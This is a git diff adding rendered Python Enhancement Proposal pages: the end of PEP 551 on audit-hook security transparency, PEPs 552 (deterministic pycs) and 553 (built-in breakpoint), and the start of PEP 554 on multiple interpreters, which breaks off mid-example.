For the sake of demonstration, the example implementation of +spython also allows the -i option to start in interactive mode. +This is not recommended for restricted entry points.

+

Log audited events

+

Before initialization, spython sets an audit hook that writes all audited events to an OS-managed log file. On Windows, this is the Event Tracing functionality [7], and on other platforms they go to syslog [11]. Logs are copied from the machine as frequently as possible to prevent loss of information should an attacker attempt to clear local logs or prevent legitimate access to the machine.

+

The audit hook will also abort all sys.addaudithook events, +preventing any other hooks from being added.

+

The logging hook is written in native code and configured before the +interpreter is initialized. This is the only opportunity to ensure that +no Python code executes without auditing, and that Python code cannot +prevent registration of the hook.

+

Our primary aim is to record all actions taken by all Python processes, +so that detection may be performed offline against logged events. +Having all events recorded also allows for deeper analysis and the use +of machine learning algorithms. These are useful for detecting +persistent attacks, where the attacker is intending to remain within +the protected machines for some period of time, as well as for later +analysis to determine the impact and exposure caused by a successful +attack.

+

The example implementation of spython writes to a log file on the +local machine, for the sake of demonstration. When started with -i, +the example implementation writes all audit events to standard error +instead of the log file. The SPYTHONLOG environment variable can be +used to specify the log file location.
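A rough Python-level approximation of that logging hook is sketched below, using the sys.addaudithook API that PEP 578 ultimately added (Python 3.8+). The SPYTHONLOG variable is a feature of the example implementation only, and the default file name here is a placeholder:

import os
+import sys
+
+# Sketch only: the real spython registers an equivalent hook in native code
+# before Py_Initialize, so no Python code can run unaudited.
+logfile = open(os.environ.get('SPYTHONLOG', 'spython-audit.log'), 'a')
+
+def log_event(event, args):
+    # Record everything; filtering happens later, at analysis time.
+    print(event, repr(args), file=logfile, flush=True)
+
+sys.addaudithook(log_event)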

+

Restrict importable modules

+

Also before initialization, spython sets an open-for-import hook +that validates all files opened with os.open_for_import. This +implementation requires all files to have a .py suffix (preventing +the use of cached bytecode), and will raise a custom audit event +spython.open_for_import containing (filename, True_if_allowed).

+

After opening the file, the entire contents are read into memory in a single buffer and the file is closed.

+

Compilation will later trigger a compile event, so there is no need +to validate the contents now using mechanisms that also apply to +dynamically generated code. However, if a whitelist of source files or +file hashes is available, then other validation mechanisms such as +DeviceGuard [4] should be performed here.

+

Restrict globals in pickles

+

The spython entry point will abort all pickle.find_class events +that use the default implementation. Overrides will not raise audit +events unless explicitly added, and so they will continue to be allowed.

+

Prevent os.system

+

The spython entry point aborts all os.system calls.

+

It should be noted here that subprocess.Popen(shell=True) is allowed (though logged via the platform-specific process creation events). This tradeoff is made because it is much simpler to induce a running application to call os.system with a single string argument than a function with multiple arguments, and so it is more likely to be used as part of an exploit. There is also little justification for using os.system in production code, while subprocess.Popen has a large number of legitimate uses; even so, logs indicating use of the shell=True argument should be scrutinised more carefully.
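A minimal sketch of this policy using the PEP 578 hook API (sys.addaudithook, available from Python 3.8) rather than spython's native-code hook:

import sys
+
+def block_os_system(event, args):
+    if event == 'os.system':
+        # Log first, then abort: recording the attempt matters more
+        # than preventing it (see General Recommendations).
+        print(f'AUDIT {event}: {args!r}', file=sys.stderr)
+        raise RuntimeError('os.system is blocked by policy')
+
+sys.addaudithook(block_os_system)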

+

Sysadmins are encouraged to make these kinds of tradeoffs between +restriction and detection, and generally should prefer detection.

+
+
+

General Recommendations

+

Recommendations beyond those suggested in the previous section are +difficult, as the ideal configuration for any environment depends on +the sysadmin’s ability to manage, monitor, and respond to activity on +their own network. Nonetheless, here we attempt to provide some context +and guidance for integrating Python into a complete system.

+

This section provides recommendations using the terms should (or should not), indicating that we consider it risky to ignore the advice, and may, indicating that the advice ought to be considered for high value systems. The term sysadmin refers to whoever is responsible for deploying Python throughout the network; different organizations may have an alternative title for the responsible people.

+

Sysadmins should build their own entry point, likely starting from +the spython source, and directly interface with the security systems +available in their environment. The more tightly integrated, the less +likely a vulnerability will be found allowing an attacker to bypass +those systems. In particular, the entry point should not obtain any +settings from the current environment, such as environment variables, +unless those settings are otherwise protected from modification.

+

Audit messages should not be written to a local file. The spython entry point does this only for demonstration and testing purposes. On production machines, tools such as ETW [7] or auditd [12] that are intended for this purpose should be used.

+

The default python entry point should not be deployed to +production machines, but could be given to developers to use and test +Python on non-production machines. Sysadmins may consider deploying +a less restrictive version of their entry point to developer machines, +since any system connected to your network is a potential target. +Sysadmins may deploy their own entry point as python to obscure +the fact that extra auditing is being included.

+

Python deployments should be made read-only using any available +platform functionality after deployment and during use.

+

On platforms that support it, sysadmins should include signatures +for every file in a Python deployment, ideally verified using a private +certificate. For example, Windows supports embedding signatures in +executable files and using catalogs for others, and can use DeviceGuard +[4] to validate signatures either automatically or using an +open_for_import hook.

+

Sysadmins should log as many audited events as possible, and +should copy logs off of local machines frequently. Even if logs are +not being constantly monitored for suspicious activity, once an attack +is detected it is too late to enable auditing. Audit hooks should +not attempt to preemptively filter events, as even benign events are +useful when analyzing the progress of an attack. (Watch the “No Easy +Breach” video under Further Reading for a deeper look at this side of +things.)

+

Most actions should not be aborted if they could ever occur during +normal use or if preventing them will encourage attackers to work around +them. As described earlier, awareness is a higher priority than +prevention. Sysadmins may audit their Python code and abort +operations that are known to never be used deliberately.

+

Audit hooks should write events to logs before attempting to abort. +As discussed earlier, it is more important to record malicious actions +than to prevent them.

+

Sysadmins should identify correlations between events, as a change +to correlated events may indicate misuse. For example, module imports +will typically trigger the import auditing event, followed by an +open_for_import call and usually a compile event. Attempts to +bypass auditing will often suppress some but not all of these events. So +if the log contains import events but not compile events, +investigation may be necessary.
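As a sketch of the idea, a hook can tally the correlated events for offline comparison (using the import, compile, and exec audit events defined by PEP 578):

import sys
+from collections import Counter
+
+counts = Counter()
+
+def tally(event, args):
+    # Offline analysis can join these counts to flag, for example,
+    # import events that were not followed by the expected compile events.
+    if event in ('import', 'compile', 'exec'):
+        counts[event] += 1
+
+sys.addaudithook(tally)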

+

The first audit hook should be set in C code before Py_Initialize is called, and that hook should unconditionally abort the sys.addaudithook event. The Python interface is primarily intended for testing and development.

+

To prevent audit hooks being added on non-production machines, an entry point may add an audit hook that aborts the sys.addaudithook event but otherwise does nothing.
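With the hook API as it finally shipped in PEP 578, that looks roughly like the following (raising from a hook on the sys.addaudithook event blocks registration of the new hook):

import sys
+
+def deny_new_hooks(event, args):
+    if event == 'sys.addaudithook':
+        # Aborting this event prevents any later hook from being added.
+        raise RuntimeError('audit hooks are locked')
+
+sys.addaudithook(deny_new_hooks)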

+

On production machines, a non-validating open_for_import hook may be set in C code before Py_Initialize is called. This prevents later code from overriding the hook; however, logging the setopenforexecutehandler event is useful, since no code should ever need to call it. Using at least the sample open_for_import hook implementation from spython is recommended.

+

Since importlib’s use of open_for_import may be easily bypassed +with monkeypatching, an audit hook should be used to detect +attribute changes on type objects.

+
+
+

Things not to do

+

This section discusses common or “obviously good” recommendations that +we are specifically not making. These range from useless or incorrect +through to ideas that are simply not feasible in any real world +environment.

+

Do not attempt to implement a sandbox within the Python runtime. +There is a long history of attempts to allow arbitrary code limited use +of Python features (such as [14]), but no general success. The best +options are to run unrestricted Python within a sandboxed environment +with at least hypervisor-level isolation, or to prevent unauthorised +code from starting at all.

+

Do not rely on static analysis to verify untrusted code before use. The best options are to pre-authorise trusted code, such as with code signing, and, if that is not possible, to identify known-bad code, such as with an anti-malware scanner.

+

Do not use audit hooks to abort operations without logging the +event first. You will regret not knowing why your process disappeared.

+

[TODO - more bad advice]

+
+
+

Further Reading

+
+
Redefining Malware: When Old Terms Pose New Threats
By Aviv Raff for SecurityWeek, 29th January 2014

This article, and those linked by it, are high-level summaries of the rise of +APTs and the differences from “traditional” malware.

+

http://www.securityweek.com/redefining-malware-when-old-terms-pose-new-threats

+
+
Anatomy of a Cyber Attack
By FireEye, accessed 23rd August 2017

A summary of the techniques used by APTs, and links to a number of relevant +whitepapers.

+

https://www.fireeye.com/current-threats/anatomy-of-a-cyber-attack.html

+
+
Automated Traffic Log Analysis: A Must Have for Advanced Threat Protection
By Aviv Raff for SecurityWeek, 8th May 2014

High-level summary of the value of detailed logging and automatic analysis.

+

http://www.securityweek.com/automated-traffic-log-analysis-must-have-advanced-threat-protection

+
+
No Easy Breach: Challenges and Lessons Learned from an Epic Investigation
Video presented by Matt Dunwoody and Nick Carr for Mandiant at SchmooCon 2016

Detailed walkthrough of the processes and tools used in detecting and removing +an APT.

+

https://archive.org/details/No_Easy_Breach

+
+
Disrupting Nation State Hackers
Video presented by Rob Joyce for the NSA at USENIX Enigma 2016

Good security practices, capabilities and recommendations from the chief of +NSA’s Tailored Access Operation.

+

https://www.youtube.com/watch?v=bDJb8WOJYdA

+
+
+
+
+

References

+ +
+
+

Acknowledgments

+

Thanks to all the people from Microsoft involved in helping make the +Python runtime safer for production use, and especially to James Powell +for doing much of the initial research, analysis and implementation, Lee +Holmes for invaluable insights into the info-sec field and PowerShell’s +responses, and Brett Cannon for the restraining and grounding +discussions.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0551.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ \ No newline at end of file diff --git a/pep-0552/index.html b/pep-0552/index.html new file mode 100644 index 00000000000..3fe0ec27f1e --- /dev/null +++ b/pep-0552/index.html @@ -0,0 +1,258 @@ PEP 552 – Deterministic pycs | peps.python.org
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 552 – Deterministic pycs

+
+
Author:
+
Benjamin Peterson <benjamin at python.org>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
04-Sep-2017
+
Python-Version:
+
3.7
+
Post-History:
+
07-Sep-2017
+
Resolution:
+
Python-Dev message
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP proposes an extension to the pyc format to make it more deterministic.

+
+
+

Rationale

+

A reproducible build is one where the same byte-for-byte output is generated +every time the same sources are built—even across different machines (naturally +subject to the requirement that they have rather similar environments +set up). Reproducibility is important for security. It is also a key concept in +content-based build systems such as Bazel, which are most effective when the +output files’ contents are a deterministic function of the input files’ +contents.

+

The current Python pyc format is the marshaled code object of the module +prefixed by a magic number, the source timestamp, and the source file +size. The presence of a source timestamp means that a pyc is not a deterministic +function of the input file’s contents—it also depends on volatile metadata, the +mtime of the source. Thus, pycs are a barrier to proper reproducibility.

+

Distributors of Python code are currently stuck with the options of

+
    +
  1. not distributing pycs and losing the caching advantages
  2. +
  3. distributing pycs and losing reproducibility
  4. +
  5. carefully giving all Python source files a deterministic timestamp +(see, for example, https://github.com/python/cpython/pull/296)
  6. +
  7. doing a complicated mixture of 1. and 2. like generating pycs at installation +time
  8. +
+

None of these options are very attractive. This PEP proposes allowing the +timestamp to be replaced with a deterministic hash. The current timestamp +invalidation method will remain the default, though. Despite its nondeterminism, +timestamp invalidation works well for many workflows and usecases. The +hash-based pyc format can impose the cost of reading and hashing every source +file, which is more expensive than simply checking timestamps. Thus, for now, we +expect it to be used mainly by distributors and power use cases.

+

(Note there are other problems [1] [2] we do not +address here that can make pycs non-deterministic.)

+
+
+

Specification

+

The pyc header currently consists of 3 32-bit words. We will expand it to 4. The +first word will continue to be the magic number, versioning the bytecode and pyc +format. The second word, conceptually the new word, will be a bit field. The +interpretation of the rest of the header and invalidation behavior of the pyc +depends on the contents of the bit field.

+

If the bit field is 0, the pyc is a traditional timestamp-based pyc. I.e., the third and fourth words will be the timestamp and file size respectively, and invalidation will be done by comparing the metadata of the source file with that in the header.

+

If the lowest bit of the bit field is set, the pyc is a hash-based pyc. We call the second lowest bit the check_source flag. Following the bit field is a 64-bit hash of the contents of the source file, computed with SipHash using a hardcoded key. Another fast hash like MD5 or BLAKE2 would also work. We choose SipHash because Python already has a builtin implementation of it from PEP 456, although an interface that allows picking the SipHash key must be exposed to Python. Security of the hash is not a concern, though we pass over completely-broken hashes like MD5 to ease auditing of Python in controlled environments.

+

When Python encounters a hash-based pyc, its behavior depends on the setting of +the check_source flag. If the check_source flag is set, Python will +determine the validity of the pyc by hashing the source file and comparing the +hash with the expected hash in the pyc. If the pyc needs to be regenerated, it +will be regenerated as a hash-based pyc again with the check_source flag +set.

+

For hash-based pycs with the check_source unset, Python will simply load the +pyc without checking the hash of the source file. The expectation in this case +is that some external system (e.g., the local Linux distribution’s package +manager) is responsible for keeping pycs up to date, so Python itself doesn’t +have to check. Even when validation is disabled, the hash field should be set +correctly, so out-of-band consistency checkers can verify the up-to-dateness of +the pyc. Note also that the PEP 3147 edict that pycs without corresponding +source files not be loaded will still be enforced for hash-based pycs.

+

The programmatic APIs of py_compile and compileall will support generation of hash-based pycs. Principally, py_compile will define a new enumeration corresponding to all the available pyc invalidation modes:

+
from enum import Enum, auto
+
+class PycInvalidationMode(Enum):
+    TIMESTAMP = auto()
+    CHECKED_HASH = auto()
+    UNCHECKED_HASH = auto()
+
+
+

py_compile.compile, compileall.compile_dir, and +compileall.compile_file will all gain an invalidation_mode parameter, +which accepts a value of the PycInvalidationMode enumeration.
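As a short usage sketch against the API as it shipped in Python 3.7 ('mod.py' is a placeholder):

import py_compile
+
+# Write a hash-based pyc with the check_source flag set, so the interpreter
+# re-hashes mod.py on import to validate the cached file.
+py_compile.compile(
+    'mod.py',
+    invalidation_mode=py_compile.PycInvalidationMode.CHECKED_HASH)
+
+# The equivalent via the compileall CLI described below:
+#   python -m compileall --invalidation-mode checked-hash mod.py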

+

The compileall tool will be extended with a new command line option, --invalidation-mode, to generate hash-based pycs with and without the check_source bit set. --invalidation-mode will be a tristate option taking values timestamp (the default), checked-hash, and unchecked-hash corresponding to the values of PycInvalidationMode.

+

importlib.util will be extended with a source_hash(source) function that +computes the hash used by the pyc writing code for a bytestring source.

+

Runtime configuration of hash-based pyc invalidation will be facilitated by a +new --check-hash-based-pycs interpreter option. This is a tristate option, +which may take 3 values: default, always, and never. The default +value, default, means the check_source flag in hash-based pycs +determines invalidation as described above. always causes the interpreter to +hash the source file for invalidation regardless of value of check_source +bit. never causes the interpreter to always assume hash-based pycs are +valid. When --check-hash-based-pycs=never is in effect, unchecked hash-based +pycs will be regenerated as unchecked hash-based pycs. Timestamp-based pycs are +unaffected by --check-hash-based-pycs.
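To make the header layout concrete, here is a sketch (assuming Python 3.7+) that parses the 4-word header and validates a hash-based pyc using the importlib.util.source_hash() helper introduced above; check_pyc is a hypothetical function for illustration:

import struct
+from importlib.util import source_hash
+
+def check_pyc(pyc_path, source_path):
+    with open(pyc_path, 'rb') as f:
+        header = f.read(16)          # 4 x 32-bit words
+    magic, flags = struct.unpack('<4sI', header[:8])
+    if flags & 0x01:                 # lowest bit: hash-based pyc
+        # second-lowest bit (flags & 0x02) is the check_source flag
+        with open(source_path, 'rb') as f:
+            expected = source_hash(f.read())
+        return header[8:16] == expected   # 64-bit hash fills words 3-4
+    # flags == 0: timestamp-based pyc; words 3 and 4 are mtime and size
+    mtime, size = struct.unpack('<II', header[8:16])
+    return None  # timestamp comparison elided in this sketch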

+
+
+

References

+ +
+
+

Credits

+

The author would like to thank Gregory P. Smith, Christian Heimes, and Steve +Dower for useful conversations on the topic of this PEP.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0552.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ \ No newline at end of file diff --git a/pep-0553/index.html b/pep-0553/index.html new file mode 100644 index 00000000000..8361ef19f14 --- /dev/null +++ b/pep-0553/index.html @@ -0,0 +1,400 @@ PEP 553 – Built-in breakpoint() | peps.python.org
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 553 – Built-in breakpoint()

+
+
Author:
+
Barry Warsaw <barry at python.org>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
05-Sep-2017
+
Python-Version:
+
3.7
+
Post-History:
+
05-Sep-2017, 07-Sep-2017, 13-Sep-2017
+
Resolution:
+
Python-Dev message
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP proposes adding a new built-in function called breakpoint() which +enters a Python debugger at the point of the call. Additionally, two new +names are added to the sys module to make the choice of which debugger is +entered configurable.

+
+
+

Rationale

+

Python has long had a great debugger in its standard library called pdb. +Setting a break point is commonly written like this:

+
foo()
+import pdb; pdb.set_trace()
+bar()
+
+
+

Thus after executing foo() and before executing bar(), Python will enter the debugger. However, this idiom has several disadvantages.

+
    +
  • It’s a lot to type (27 characters).
  • +
  • It’s easy to typo. The PEP author often mistypes this line, e.g. omitting +the semicolon, or typing a dot instead of an underscore.
  • +
  • It ties debugging directly to the choice of pdb. There might be other +debugging options, say if you’re using an IDE or some other development +environment.
  • +
  • Python linters (e.g. flake8 [linters]) complain about this line because it +contains two statements. Breaking the idiom up into two lines complicates +its use because there are more opportunities for mistakes at clean up time. +I.e. you might forget to delete one of those lines when you no longer need +to debug the code.
  • +
+

Python developers also have many other debuggers to choose from, but remembering how to invoke them can be problematic. For example, even when IDEs have a user interface for setting breakpoints, it may still be more convenient to just edit the code. The APIs for entering the debugger programmatically are inconsistent, so it can be difficult to remember exactly what to type.

+

We can solve all these problems by providing a universal API for entering the +debugger, as proposed in this PEP.

+
+
+

Proposal

+

The JavaScript language provides a debugger statement [js-debugger] which enters +the debugger at the point where the statement appears.

+

This PEP proposes a new built-in function called breakpoint() +which enters a Python debugger at the call site. Thus the example +above would be written like so:

+
foo()
+breakpoint()
+bar()
+
+
+

Further, this PEP proposes two new name bindings for the sys +module, called sys.breakpointhook() and +sys.__breakpointhook__. By default, sys.breakpointhook() +implements the actual importing and entry into pdb.set_trace(), +and it can be set to a different function to change the debugger that +breakpoint() enters.

+

sys.__breakpointhook__ is initialized to the same function as +sys.breakpointhook() so that you can always easily reset +sys.breakpointhook() to the default value (e.g. by doing +sys.breakpointhook = sys.__breakpointhook__). This is exactly the same as +how the existing sys.displayhook() / sys.__displayhook__ and +sys.excepthook() / sys.__excepthook__ work [hooks].
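For example, a custom hook can be swapped in and later restored (a sketch; the printing hook stands in for a real debugger integration):

import sys
+
+def my_hook(*args, **kws):
+    # A real IDE integration would attach its debugger here.
+    print('breakpoint() reached with', args, kws)
+
+sys.breakpointhook = my_hook
+breakpoint('checking state')                  # runs my_hook, not pdb
+sys.breakpointhook = sys.__breakpointhook__   # restore the default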

+

The signature of the built-in is breakpoint(*args, **kws). The positional +and keyword arguments are passed straight through to sys.breakpointhook() +and the signatures must match or a TypeError will be raised. The return +from sys.breakpointhook() is passed back up to, and returned from +breakpoint().

+

The rationale for this is based on the observation that the underlying +debuggers may accept additional optional arguments. For example, IPython +allows you to specify a string that gets printed when the break point is +entered [ipython-embed]. As of Python 3.7, the pdb module also supports an +optional header argument [pdb-header].
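With the default hook on Python 3.7, for instance, this pass-through allows:

breakpoint(header='entering retry loop')   # forwarded to pdb.set_trace()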

+
+
+

Environment variable

+

The default implementation of sys.breakpointhook() consults a new +environment variable called PYTHONBREAKPOINT. This environment variable +can have various values:

+
    +
  • PYTHONBREAKPOINT=0 disables debugging. Specifically, with this value +sys.breakpointhook() returns None immediately.
  • +
  • PYTHONBREAKPOINT= (i.e. the empty string). This is the same as not +setting the environment variable at all, in which case pdb.set_trace() +is run as usual.
  • +
  • PYTHONBREAKPOINT=some.importable.callable. In this case, +sys.breakpointhook() imports the some.importable module and gets the +callable object from the resulting module, which it then calls. The +value may be a string with no dots, in which case it names a built-in +callable, e.g. PYTHONBREAKPOINT=int. (Guido has expressed the +preference for normal Python dotted-paths, not setuptools-style entry point +syntax [syntax].)
  • +
+

This environment variable allows external processes to control how breakpoints are handled. Some use cases include:

+
    +
  • Completely disabling all accidental breakpoint() calls pushed to +production. This could be accomplished by setting PYTHONBREAKPOINT=0 in +the execution environment. Another suggestion by reviewers of the PEP was +to set PYTHONBREAKPOINT=sys.exit in this case.
  • +
  • IDE integration with specialized debuggers for embedded execution. The IDE +would run the program in its debugging environment with PYTHONBREAKPOINT +set to their internal debugging hook.
  • +
+

PYTHONBREAKPOINT is re-interpreted every time sys.breakpointhook() is +reached. This allows processes to change its value during the execution of a +program and have breakpoint() respond to those changes. It is not +considered a performance critical section since entering a debugger by +definition stops execution. Thus, programs can do the following:

+
os.environ['PYTHONBREAKPOINT'] = 'foo.bar.baz'
+breakpoint()    # Imports foo.bar and calls foo.bar.baz()
+
+
+

Overriding sys.breakpointhook defeats the default consultation of PYTHONBREAKPOINT. It is up to the overriding code to consult PYTHONBREAKPOINT if it wants to.

+

If access to the PYTHONBREAKPOINT callable fails in any way (e.g. the +import fails, or the resulting module does not contain the callable), a +RuntimeWarning is issued, and no breakpoint function is called.

+

Note that as with all other PYTHON* environment variables, PYTHONBREAKPOINT is ignored when the interpreter is started with -E. This means the default behavior will occur (i.e. pdb.set_trace() will run). There was some discussion about alternatively treating -E as if PYTHONBREAKPOINT=0 were in effect, but the opinions were inconclusive, so it was decided that this wasn’t special enough for a special case.

+
+
+

Implementation

+

A pull request exists with the proposed implementation [impl].

+

While the actual implementation is in C, the Python pseudo-code for this +feature looks roughly like the following:

+
# In builtins.
+def breakpoint(*args, **kws):
+    import sys
+    missing = object()
+    hook = getattr(sys, 'breakpointhook', missing)
+    if hook is missing:
+        raise RuntimeError('lost sys.breakpointhook')
+    return hook(*args, **kws)
+
+# In sys.
+def breakpointhook(*args, **kws):
+    import importlib, os, warnings
+    hookname = os.getenv('PYTHONBREAKPOINT')
+    if hookname is None or len(hookname) == 0:
+        hookname = 'pdb.set_trace'
+    elif hookname == '0':
+        return None
+    modname, dot, funcname = hookname.rpartition('.')
+    if dot == '':
+        modname = 'builtins'
+    try:
+        module = importlib.import_module(modname)
+        hook = getattr(module, funcname)
+    except:
+        warnings.warn(
+            'Ignoring unimportable $PYTHONBREAKPOINT: {}'.format(
+                hookname),
+            RuntimeWarning)
+        return None
+    return hook(*args, **kws)
+
+__breakpointhook__ = breakpointhook
+
+
+
+
+

Rejected alternatives

+
+

A new keyword

+

Originally, the author considered a new keyword, or an extension to an +existing keyword such as break here. This is rejected on several fronts.

+
    +
  • A brand new keyword would require a __future__ to enable it since almost +any new keyword could conflict with existing code. This negates the ease +with which you can enter the debugger.
  • +
  • An extended keyword such as break here, while more readable and not +requiring a __future__ would tie the keyword extension to this new +feature, preventing more useful extensions such as those proposed in +PEP 548.
  • +
  • A new keyword would require a modified grammar and likely a new bytecode. +Each of these makes the implementation more complex. A new built-in breaks +no existing code (since any existing module global would just shadow the +built-in) and is quite easy to implement.
  • +
+
+
+

sys.breakpoint()

+

Why not sys.breakpoint()? Requiring an import to invoke the debugger is +explicitly rejected because sys is not imported in every module. That +just requires more typing and would lead to:

+
import sys; sys.breakpoint()
+
+
+

which inherits several of the problems this PEP aims to solve.

+
+
+
+

Version History

+
    +
  • 2019-10-13
      +
    • Add missing return None in except clause to pseudo-code.
    • +
    +
  • +
  • 2017-09-13
      +
    • The PYTHONBREAKPOINT environment variable is made a first class +feature.
    • +
    +
  • +
  • 2017-09-07
      +
    • debug() renamed to breakpoint()
    • +
    • Signature changed to breakpoint(*args, **kws) which is passed straight +through to sys.breakpointhook().
    • +
    +
  • +
+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0553.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ \ No newline at end of file diff --git a/pep-0554/index.html b/pep-0554/index.html new file mode 100644 index 00000000000..9f3f73d9da4 --- /dev/null +++ b/pep-0554/index.html @@ -0,0 +1,2084 @@ PEP 554 – Multiple Interpreters in the Stdlib | peps.python.org
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 554 – Multiple Interpreters in the Stdlib

+
+
Author:
+
Eric Snow <ericsnowcurrently at gmail.com>
+
Discussions-To:
+
Discourse thread
+
Status:
+
Superseded
+
Type:
+
Standards Track
+
Created:
+
05-Sep-2017
+
Python-Version:
+
3.13
+
Post-History:
+
07-Sep-2017, +08-Sep-2017, +13-Sep-2017, +05-Dec-2017, +04-May-2020, +14-Mar-2023, +01-Nov-2023
+
Superseded-By:
+
734
+
+
+
+
Table of Contents +
+
+

Note

+

This PEP effectively continues in a cleaner form in PEP 734. +This PEP is kept as-is for the sake of the various sections of +background information and deferred/rejected ideas that have +been stripped from PEP 734.

+
+
+

Abstract

+

CPython has supported multiple interpreters in the same process (AKA +“subinterpreters”) since version 1.5 (1997). The feature has been +available via the C-API. [c-api] Multiple interpreters operate in +relative isolation from one another, which +facilitates novel alternative approaches to +concurrency.

+

This proposal introduces the stdlib interpreters module. It exposes +the basic functionality of multiple interpreters already provided by the +C-API, along with basic support for communicating between interpreters. +This module is especially relevant since PEP 684 introduced a +per-interpreter GIL in Python 3.12.

+
+
+

Proposal

+

Summary:

+
    +
  • add a new stdlib module: “interpreters”
  • +
  • add concurrent.futures.InterpreterPoolExecutor
  • +
  • help for extension module maintainers
  • +
+
+

The “interpreters” Module

+

The interpreters module will provide a high-level interface to the multiple interpreter functionality and wrap a new low-level _interpreters module (in the same way as the threading module). See the Examples section for concrete usage and use cases.

+

Along with exposing the existing (in CPython) multiple interpreter +support, the module will also support a basic mechanism for +passing data between interpreters. That involves setting “shareable” +objects in the __main__ module of a target subinterpreter. Some +such objects, like os.pipe(), may be used to communicate further. +The module will also provide a minimal implementation of “channels” +as a demonstration of cross-interpreter communication.

+

Note that objects are not shared between interpreters since they are +tied to the interpreter in which they were created. Instead, the +objects’ data is passed between interpreters. See the Shared Data +and API For Communication sections for more details about +sharing/communicating between interpreters.

+
+
+

API summary for interpreters module

+

Here is a summary of the API for the interpreters module. For a +more in-depth explanation of the proposed classes and functions, see +the “interpreters” Module API section below.

+

For creating and using interpreters:

+ + + + + + + + + + + + + + + + + + + + +
signaturedescription
list_all() -> [Interpreter]Get all existing interpreters.
get_current() -> InterpreterGet the currently running interpreter.
get_main() -> InterpreterGet the main interpreter.
create() -> InterpreterInitialize a new (idle) Python interpreter.
+
+

+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
signaturedescription
class InterpreterA single interpreter.
.idThe interpreter’s ID (read-only).
.is_running() -> boolIs the interpreter currently executing code?
.close()Finalize and destroy the interpreter.
.set_main_attrs(**kwargs)Bind “shareable” objects in __main__.
.get_main_attr(name)Get a “shareable” object from __main__.
.exec(src_str, /)Run the given source code in the interpreter (in the current thread).
+
+
+

For communicating between interpreters:

+ + + + + + + + + + + + + + +
signaturedescription
is_shareable(obj) -> BoolCan the object’s data be passed between interpreters?
+
create_channel() -> (RecvChannel, SendChannel)Create a new channel for passing data between interpreters.
+
+
+
+
+

concurrent.futures.InterpreterPoolExecutor

+

An executor will be added that extends ThreadPoolExecutor to run +per-thread tasks in subinterpreters. Initially, the only supported +tasks will be whatever Interpreter.exec() takes (e.g. a str +script). However, we may also support some functions, as well as +eventually a separate method for pickling the task and arguments, +to reduce friction (at the expense of performance +for short-running tasks).
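For context, the executor that ultimately shipped (in Python 3.14) takes picklable callables like its ThreadPoolExecutor parent, so usage looks roughly like this sketch:

from concurrent.futures import InterpreterPoolExecutor
+
+def work(n):
+    # Runs in a worker thread backed by its own subinterpreter.
+    return sum(range(n))
+
+with InterpreterPoolExecutor(max_workers=4) as pool:
+    results = list(pool.map(work, [10, 100, 1000]))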

+
+
+

Help for Extension Module Maintainers

+

In practice, an extension that implements multi-phase init (PEP 489) +is considered isolated and thus compatible with multiple interpreters. +Otherwise it is “incompatible”.

+

Many extension modules are still incompatible. The maintainers and +users of such extension modules will both benefit when they are updated +to support multiple interpreters. In the meantime, users may become +confused by failures when using multiple interpreters, which could +negatively impact extension maintainers. See Concerns below.

+

To mitigate that impact and accelerate compatibility, we will do the +following:

+
    +
  • be clear that extension modules are not required to support use in +multiple interpreters
  • +
  • raise ImportError when an incompatible module is imported +in a subinterpreter
  • +
  • provide resources (e.g. docs) to help maintainers reach compatibility
  • +
  • reach out to the maintainers of Cython and of the most used extension +modules (on PyPI) to get feedback and possibly provide assistance
  • +
+
+
+
+

Examples

+
+

Run isolated code in current OS thread

+
interp = interpreters.create()
+print('before')
+interp.exec('print("during")')
+print('after')
+
+
+
+
+

Run in a different thread

+
interp = interpreters.create()
+def run():
+    interp.exec('print("during")')
+t = threading.Thread(target=run)
+print('before')
+t.start()
+t.join()
+print('after')
+
+
+
+
+

Pre-populate an interpreter

+
interp = interpreters.create()
+interp.exec(tw.dedent("""
+    import some_lib
+    import an_expensive_module
+    some_lib.set_up()
+    """))
+wait_for_request()
+interp.exec(tw.dedent("""
+    some_lib.handle_request()
+    """))
+
+
+
+
+

Handling an exception

+
interp = interpreters.create()
+try:
+    interp.exec(tw.dedent("""
+        raise KeyError
+        """))
+except interpreters.RunFailedError as exc:
+    print(f"got the error from the subinterpreter: {exc}")
+
+
+
+
+

Re-raising an exception

+
interp = interpreters.create()
+try:
+    try:
+        interp.exec(tw.dedent("""
+            raise KeyError
+            """))
+    except interpreters.RunFailedError as exc:
+        raise exc.__cause__
+except KeyError:
+    print("got a KeyError from the subinterpreter")
+
+
+

Note that this pattern is a candidate for later improvement.

+
+
+

Interact with the __main__ namespace

+
interp = interpreters.create()
+interp.set_main_attrs(a=1, b=2)
+interp.exec(tw.dedent("""
+    res = do_something(a, b)
+    """))
+res = interp.get_main_attr('res')
+
+
+
+
+

Synchronize using an OS pipe

+
interp = interpreters.create()
+r1, s1 = os.pipe()
+r2, s2 = os.pipe()
+
+def task():
+    interp.exec(tw.dedent(f"""
+        import os
+        os.read({r1}, 1)
+        print('during B')
+        os.write({s2}, b'0')
+        """))
+
+t = threading.Thread(target=task)
+t.start()
+print('before')
+os.write(s1, b'0')
+print('during A')
+os.read(r2, 1)
+print('after')
+t.join()
+
+
+
+
+

Sharing a file descriptor

+
interp = interpreters.create()
+with open('spamspamspam') as infile:
+    interp.set_main_attrs(fd=infile.fileno())
+    interp.exec(tw.dedent(f"""
+        import os
+        for line in os.fdopen(fd):
+            print(line)
+        """))
+
+
+
+
+

Passing objects via pickle

+
interp = interpreters.create()
+r, s = os.pipe()
+interp.exec(tw.dedent(f"""
+    import os
+    import pickle
+    reader = {r}
+    """))
+interp.exec(tw.dedent(r"""
+        c = os.read(reader, 1)
+        while c != b'\x00':
+            data = b''
